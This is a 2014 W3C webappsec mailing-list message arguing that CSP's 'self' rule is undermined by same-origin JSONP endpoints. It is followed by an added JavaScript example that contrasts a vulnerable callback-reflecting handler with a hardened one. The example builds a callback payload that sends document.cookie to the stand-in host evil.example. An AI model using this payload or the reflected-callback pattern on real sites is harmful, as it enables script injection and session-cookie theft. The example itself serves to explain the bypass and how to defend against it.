- From: Michal Zalewski <lcamtuf@google.com>
- Date: Wed, 12 Feb 2014 07:42:31 -0800
- To: Mike West <mkwst@google.com>
- Cc: "Eduardo' Vela" <evn@google.com>, Brad Hill <bhill@paypal-inc.com>, Odin Hørthe Omdal <odinho@opera.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Adam Barth <w3c@adambarth.com>, Garrett Robinson <grobinson@mozilla.com>, Daniel Veditz <dveditz@mozilla.com>
> Happily, I'm not on Google's infra security team, so I can suggest that
> Google should be more careful about a) scoping APIs to origins, and b) not
> allowing arbitrary callbacks, while remaining blissfully unaware of the work
> that would be involved in doing so. :)

I think that making the value of CSP hinge on the assumption that nothing else you host in the origin will have any side effects if loaded somewhere else greatly diminishes its value to any medium-size web property. JSONP APIs are just an intuitive example, but I bet that there are dozens or hundreds of other opportunities across paypal.com, facebook.com, google.com, etc.

/mz
Received on Wednesday, 12 February 2014 15:43:21 UTC
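The bypass Michal alludes to, as an added example that is not part of the thread and not code from any of the sites named. It models a hypothetical JSONP endpoint `/api/profile` on `example.com` whose `callback` parameter is reflected verbatim: a page on that origin served with `script-src 'self'` blocks inline script, but a `<script src>` pointing at the same-origin JSONP endpoint passes the `'self'` check, so the attacker-chosen callback becomes the script body. The hardened handler alongside it restricts the callback to a dotted JavaScript identifier and adds the `/**/` prefix and `nosniff` header; the regex and endpoint name are assumptions for the example.

```javascript
// Added example (not from the thread): JSONP vs. script-src 'self'.
// Endpoint path, origin and the CALLBACK_RE policy are assumptions.

const PAGE_ORIGIN = "https://example.com";          // origin that sets script-src 'self'
const JSONP_ENDPOINT = PAGE_ORIGIN + "/api/profile"; // hypothetical JSONP API on the same origin

// Minimal model of the 'self' source-expression check a browser applies to
// <script src="..."> under "script-src 'self'": scheme and host must match the page origin.
function cspSelfAllowsScript(pageOrigin, scriptUrl) {
  const u = new URL(scriptUrl);
  return `${u.protocol}//${u.host}` === pageOrigin;
}

// Vulnerable handler: reflects the callback name into the response body unchanged,
// so the response is an attacker-authored script served from a 'self' origin.
function jsonpVulnerable(query, data) {
  const cb = query.get("callback") || "callback";
  return {
    status: 200,
    headers: { "Content-Type": "application/javascript; charset=utf-8" },
    body: `${cb}(${JSON.stringify(data)});`,
  };
}

// Hardened handler: the callback must be a plain (optionally dotted) identifier,
// the body is prefixed with /**/ to defeat content-sniffing tricks, and nosniff
// keeps the response from being treated as anything but script.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}(\.[A-Za-z_$][\w$]{0,63})*$/;
function jsonpHardened(query, data) {
  const cb = query.get("callback") || "callback";
  if (!CALLBACK_RE.test(cb)) {
    return { status: 400, headers: { "Content-Type": "text/plain" }, body: "" };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: `/**/${cb}(${JSON.stringify(data)});`,
  };
}

// What an HTML-injection sink on example.com would be made to emit: inline script
// is blocked by the policy, but this <script src> points at the same origin.
function attackerScriptUrl() {
  const payload = "fetch('https://evil.example/c?d='+document.cookie);//";
  return JSONP_ENDPOINT + "?callback=" + encodeURIComponent(payload);
}

// Serve a request URL through a handler; returns the response the browser would execute.
function serve(handler, requestUrl, data) {
  return handler(new URL(requestUrl).searchParams, data);
}

// Demonstration when run directly.
if (typeof require !== "undefined" && require.main === module) {
  const url = attackerScriptUrl();
  console.log("allowed by 'self':", cspSelfAllowsScript(PAGE_ORIGIN, url));
  console.log("vulnerable body:", serve(jsonpVulnerable, url, { user: "alice" }).body);
  console.log("hardened status:", serve(jsonpHardened, url, { user: "alice" }).status);
}
```

The point the two handlers make is the one in the mail: `'self'` says nothing about what the origin's endpoints will emit, so every reflected-callback API on the origin is a script-src bypass unless the callback is constrained server-side (or the policy moves to nonces or hashes rather than origin allow-listing).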